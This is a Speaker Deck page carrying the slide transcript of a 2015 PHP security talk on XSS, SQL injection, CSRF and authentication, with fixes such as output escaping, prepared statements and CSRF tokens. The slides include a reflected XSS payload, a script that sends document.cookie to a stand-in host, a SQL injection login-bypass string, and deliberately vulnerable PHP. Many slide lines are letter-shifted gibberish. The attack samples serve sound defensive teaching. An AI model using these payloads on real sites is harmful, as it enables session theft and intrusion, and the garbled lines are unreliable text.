Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Secure PHP Bootcamp

Avatar for Chris Cornutt Chris Cornutt
January 23, 2015
Technology
0
660

Secure PHP Bootcamp

Given at PHP Benelux 2015
Avatar for Chris Cornutt

Chris Cornutt

January 23, 2015
Tweet

More Decks by Chris Cornutt

See All by Chris Cornutt
Securing Legacy Applications
Avatar for Chris Cornutt ccornutt
0
140
Pentesting for Developers
Avatar for Chris Cornutt ccornutt
0
140
Securing Legacy Applications - Longhorn PHP 2018
Avatar for Chris Cornutt ccornutt
1
190
Pieces of Auth
Avatar for Chris Cornutt ccornutt
0
340
Securing Legacy Applications
Avatar for Chris Cornutt ccornutt
0
510
Build Security In
Avatar for Chris Cornutt ccornutt
0
210
Introduction to Slim 3
Avatar for Chris Cornutt ccornutt
0
170
Securing Legacy Applications
Avatar for Chris Cornutt ccornutt
0
32
PHP Security, Redfined
Avatar for Chris Cornutt ccornutt
0
280

Other Decks in Technology

See All in Technology
10分で学ぶ、RAGの仕組みと実践
Avatar for Marimo supermarimobros
0
880
Computer Use〜OpenAIとAnthropicの比較と将来の展望〜
Avatar for PharmaX(旧YOJO Technologies)開発チーム pharma_x_tech
6
1k
Azure Maps Visual in PowerBIで分析しよう
Avatar for なかしょ nakasho
0
210
2025-04-24 "Manga AI Understanding & Localization" Furukawa Arata (CyberAgent, Inc)
Avatar for Arata Furukawa ornew
2
390
AI駆動で進化する開発プロセス ~クラスメソッドでの実践と成功事例~ / aidd-in-classmethod
Avatar for tomoki10 tomoki10
1
970
正式リリースされた Semantic Kernel の Agent Framework 全部紹介!
Avatar for Kazuki okazuki
1
840
Twelve-Factor-Appから学ぶECS設計プラクティス/ECS practice for Twelve-Factor-App
Avatar for k-ozawa ozawa
3
160
ビジネスとデザインとエンジニアリングを繋ぐために 一人のエンジニアは何ができるか / What can a single engineer do to connect business, design, and engineering?
Avatar for 株式会社カミナシ kaminashi
2
890
製造業向けIoTソリューション提案資料.pdf
Avatar for h.uriu haruki_uiru
0
220
データベース04: SQL (1/3) 単純質問 & 集約演算
Avatar for Y. Yamamoto trycycle
PRO
0
720
企業が押さえるべきMCPの未来
Avatar for TakaakiKakei takaakikakei
4
980
白金鉱業Meetup_Vol.18_AIエージェント時代のUI/UX設計
Avatar for BrainPad brainpadpr
1
290

Featured

See All Featured
What's in a price? How to price your products and services
Avatar for Michael Herold michaelherold
245
12k
Build your cross-platform service in a week with App Engine
Avatar for Jose L jlugia
230
18k
The Language of Interfaces
Avatar for Des Traynor destraynor
158
25k
StorybookのUI Testing Handbookを読んだ
Avatar for Shingo Yamazaki zakiyama
30
5.7k
Visualization
Avatar for Eitan Lees eitanlees
146
16k
Site-Speed That Sticks
Avatar for Harry Roberts csswizardry
6
540
A better future with KSS
Avatar for Kyle Neath kneath
239
17k
Product Roadmaps are Hard
Avatar for C. Todd Lombardo iamctodd
PRO
53
11k
We Have a Design System, Now What?
Avatar for Morgane Peng morganepeng
52
7.6k
Facilitating Awesome Meetings
Avatar for Lara Hogan lara
54
6.3k
Into the Great Unknown - MozCon
Avatar for Noah Learner thekraken
38
1.7k
Optimising Largest Contentful Paint
Avatar for Harry Roberts csswizardry
37
3.2k

Transcript

  1. Secure PHP Development $ISJT$PSOVUU!FOZHNB

  2. https://jetbrains.com

  3. Goals #BTJDBQQTFDQSJODJQMFT 7VMOFSBCJMJUJFT&YQMPJUT )BOETPOFYQFSJFODF 5PPMT5FDIOJRVFT

  4. 1)1%FW :FBST "QQTFDGPDVTFE IUUQXFCTFDJP IUUQTFDVSJOHQIQDPN

  5. IUUQCJUMZPXBTQUPQ

  6. 5IFSF`T OPTVDIUIJOH BTTFDVSF

  7. IUUQTHJUIVCDPNQTFDJPOPUDI /PUDI"7VMOFSBCMF"QQMJDBUJPO

  8. IUUQTHJUIVCDPNQTFDJPOPUDI 4FUVQ5JNF PSIUUQOPUDITFDVSJOHQIQDPN

  9. None

  10. XSS: Cross Site Scripting

  11. *OKFDUJPOPGDPOUFOUJOUPUIFQBHF VTVBMMZ+BWBTDSJQU SFqFDUFEWTTUPSFE QPPSPVUQVUFTDBQJOH

  12. Example <?php echo “Howdy, my name is “.$_GET[‘name’]; ?> ?name=<script>alert(“xss”)</script>

  13. Example <script> xmlhttp = new XMLHttpRequest(); xmlhttp.open( 'GET', ‘http://leethack.php?cookies=‘+document.cookie, true);

    xmlhttp.send(); </script> "TTVNFTDSPTTPSJHJOQPMJDZPG

  14. Prevention #1 <?php $name = htmlspecialchars( $_GET[‘name’], ENT_COMPAT, ‘UTF-8’ );

    echo “Howdy, my name is “.$name; ?> /PUF5IJTJTPOMZGPSB)5.-DPOUFYU

  15. Prevention #2 {{ name|e(‘html’) }} {{ name|e(‘html_attr’) }} {{ name|e(‘js’)

    }} {{ name|e(‘css’) }} /PUF5IJTFYBNQMFSFRVJSFT5XJH

  16. SQLi: SQL Injection

  17. *OKFDUJPOTQFDJpDUP42-TUBUFNFOUT FYQPTFEBUB CZQBTTBVUI NFDIBOJTNT QPPSJOQVUpMUFSJOH

  18. Example $sql = ‘select id from users where username =

    “‘.$_POST[‘username’].’” and password = “‘.$_POST[‘password’].’”’; password=‘ or 1=1; # select id from users where username = “user1” and password = “” or 1=1; #

  19. BEE@TMBTIFT NZTRM@SFBM@FTDBQF@TUSJOH NZTRMJ@SFBM@FTDBQF@TUSJOH

  20. BEE@TMBTIFT NZTRM@SFBM@FTDBQF@TUSJOH NZTRMJ@SFBM@FTDBQF@TUSJOH X

  21. Prevention <?php $stmt = $dbh->prepare(‘select id from users’ .’ where

    username = :user’ .’ and password = :pass’); $stmt->execute(array( ‘user’ => $_POST[‘username’], ‘pass’ => $_POST[‘password’] )); $results = $stmt->fetchAll(PDO::FETCH_ASSOC); ?> /PUF5IJTFYBNQMFSFRVJSFT1%0TVQQPSU

  22. CSRF: Cross Site Request Forgery

  23. VOWBMJEBUFEGPSNTVCNJTTJPO POBMMTUBUFDIBOHFT XIBU`TUIFTPVSDF  TJNQMF SBOEPNJ[FE GPSFBDIGPSN

  24. Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>

    <input type=“submit” value=“Register”/> </form>

  25. Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>

    <input type=“submit” value=“Register”/> <input type=“hidden” value=“098f6bcd4621d373cade4e832627b4f6” name=“csrf-token”/> </form>

  26. Auth*: Authentication & Authorization

  27. EJSFDUPCKFDUSFGFSFODF "  EBUBBDDFTT EBOHFSPVTBDUJPOT QPPSVTFSNBOBHFNFOU

  28. QMBJOUFYUQBTTXPSET OPQBTTXPSEQPMJDZ PWFSMZDPNQMFYQBTTXPSET QBTTXPSEIJOUT

  29. None
  30. None

  31. And…

  32. 4FDVSJUZ.JTDPOpHVSBUJPO 4FOTJUJWF%BUB&YQPTVSF $PNQPOFOUTXJUI,OPXO7VMOFSBCJMJUJFT 6OWBMJEBUFE3FEJSFDUTBOE'PSXBSET

  33. 5IBU`TBMMGPMLT !FOZHNB !TFDVSJOHQIQ IUUQTFDVSJOHQIQDPN